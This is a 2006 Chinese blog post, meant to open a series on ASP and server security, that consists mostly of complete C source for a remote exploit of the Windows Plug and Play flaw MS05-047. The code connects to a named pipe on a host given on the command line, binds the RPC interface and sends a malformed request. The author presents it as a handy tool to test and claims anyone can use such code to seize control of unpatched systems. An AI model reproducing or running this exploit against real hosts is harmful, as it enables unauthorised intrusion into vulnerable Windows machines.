asp與網站安全的初步構想(1)——作業系統安全
今天是2006年3月8日,現祝福所有的女性朋友節日快樂。
早上起床,收到朋友的簡訊,幫助她確定一下畢業設計的題目。
她是搞計算機的,但是現在的中國教育就是如此,教你很高深的理論知識,但是實際的動手的東西就比較少了,雖然她的成績很好,但是真正設計到畢業設計的實際動手的時候,他自己也開始擔心了。而且以前他就給我說過這件事情。君子一言,駟馬難追啊!更何況是朋友呢!
現看看了看,他傳送過來的課題,看來看去還是覺得軟體開發之類的實際動手能力比較適合我自己,而且選擇這些東西對她自己也是一次鍛鍊、挑戰。要不然以後想學習還學不到了。
挑過來,選過去。還是選擇了安全相關的問題。不為別的,我開始就是一直注重安全的問題的,自己對這個東西很早就想寫東西了,只是自己太懶了,而且也一直沒有時間寫,這次剛好好好的總結學習一下。
今天開始第一課——IIS安全
asp安全,怎麼說了?
安全這個東西不是一兩句話就能說明白的,而且設計的面也不是一兩個人能完成的。因為安全問題是一個整體的問題。
我考慮安全問題的第一個反應就是伺服器安全。光這個方面就好多東西可以寫。任何一個安裝到系統上的軟體都可能影響到伺服器的安全,包括系統。
比如:大家所熟悉的windows 2K系統,相信不用說,大家應該知道MS每個月的安全警報吧,好像從2K出世以來就沒有被拉下過。解決這個問題的唯一辦法就是經常打上系統地sp,勤動手,總是有好處的。
在這裡可能又有人說了,我不用win 2K ,我用XP,而且還是sp2的。嘿嘿,不用擔心,這個東西出來的時候就開始說非常的堅固了,但是天下沒有完美的東西。過不了幾天也出現了Exception。嘿嘿,這個就是我今天想說的。
今天再翻動我以前的exploit的時候發現了這個好東西,方便大家測試一下。
Windows Plus and Play Remote Code Exception (MS05-047)
漏洞資料:http://www.microsoft.com/china/technet/security/bulletin/MS05-047.mspx
危險程度:非常嚴重
影響範圍:
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
解決辦法:官方已經發布補丁
相關介紹:即插即用中的漏洞可能允許遠端執行程式碼和特權提升
——————————————————————————
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, “mpr”)
#pragma comment(lib, “Rpcrt4”)
unsigned char szBindString[] =
{
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
unsigned char szRequestString[] =
{
0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
};
int main(int argc, char* argv[])
{
char szServerName[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
NETRESOURCE nr;
if (argc < 2){
printf(“[-] Usage: %s <host>/n”, argv[0]);
return -1;
}
if ( strlen(argv[1]) > (MAX_PATH – 50) ) {
printf(“[-] Host name %s is too long !/n”);
return -1;
}
printf(“[+] Start connect host %s … /n”, argv[1]);
wsprintf( szServerName, “////%s//pipe“, argv[1] );
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = szServerName;
nr.lpProvider = NULL;
if ( WNetAddConnection2(&nr, “”, “”, 0) != NO_ERROR ) {
printf(“[-] Connect to host %s failed !/n”, argv[1]);
return -1;
}
_snprintf(szPipe, sizeof(szPipe), “////%s//pipe//browser“, argv[1]);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == INVALID_HANDLE_VALUE ) {
printf(“[-] Open name pipe %s failed !/n”, szPipe);
return -1;
}
unsigned char szOutBuffer[0X1000];
unsigned long nBytesRead;
printf(“[+] Start bind RPC interface … /n”);
// bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf(“[-] TransactNamedPipe (Binding) failed !/n”);
CloseHandle(hFile);
return -1;
}
// send rpc request to call PNP_GetDeviceList (opnum 10)
printf(“[+] Start send RPC request … /n”);
if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf(“[-] TransactNamedPipe (Binding) failed !/n”);
CloseHandle(hFile);
return -1;
}
printf(“[+] Attack host %s complete !/n”, argv[1]);
return 0;
}
上面的程式碼你再vc++下編譯一下,如果你沒有打系統的補丁的話,恭喜你,你可以看到好結果了。
通過類似於上面的Exception的程式碼就可以得到伺服器的許可權,想修改你的問題簡直是易如反掌啊。
這個就是今天演示的程式程式碼(行內稱之為:Exploit),通過這些程式碼,任何一個會使用計算機的人都可以得到系統的控制權。哈哈,這樣,你的祕密就成了天下皆知的祕密了。
ok,今天的課程現到這裡,寢室熄燈了,室友都睡著了,我也的休息了,明天繼續。
相關文章
- 網站安全之系統與伺服器安全管理網站伺服器
- 作業系統的安全配置作業系統
- AIX作業系統安全加固AI作業系統
- 物聯網作業系統安全性分析作業系統
- 網站的初步製作網站
- 初級安全入門——Windows作業系統的安全加固Windows作業系統
- 配置安全的Linux作業系統(轉)Linux作業系統
- 物流運輸系統建設初步構想
- FortiOS5.6:全面面向協同網路安全構建的作業系統iOS作業系統
- 19-作業系統安全保護作業系統
- 如何讓你的作業系統更安全二作業系統
- 讓你的linux作業系統更加安全Linux作業系統
- Unix作業系統的部分重要網站作業系統網站
- 初步學習密碼系統的安全性密碼
- ASP網路安全手冊(1) (轉)
- 紅帽作業系統日常安全維護作業系統
- 登高作業安全繩佩戴識別系統
- 變電站人員安全作業行為識別監測系統
- 作業系統(1)——作業系統概述作業系統
- 智慧安全3.0引領,構建工業網際網路安全保障體系
- 大型網站技術架構(八)--網站的安全架構網站架構
- 作業系統(二):作業系統結構作業系統
- 企業網架構與安全裝置部署架構
- 《網路安全原理與實踐》一1.8網路安全體系結構的部署
- 企業如何保障網站安全?網站
- WindowsXP作業系統的八大安全策略Windows作業系統
- Linux作業系統的安全性怎麼樣?Linux作業系統
- 10分鐘打造完美安全的Windows作業系統Windows作業系統
- 作業系統(二)——程式的描述與控制(1)作業系統
- 網站安全體系建設網站
- 作業系統1—作業系統概論(上)作業系統
- Ftrans跨網檔案安全交換系統:企業資料安全的守護者!
- 網站安全網站
- 網站防黑客入侵的主機系統安全配置方法網站黑客
- 什麼是網站系統安全的滲透檢測?網站
- MQTT 安全解析:構建可靠的物聯網系統MQQT
- 智慧手機作業系統安全性簡評作業系統
- 深入分析Linux作業系統深度安全加固Linux作業系統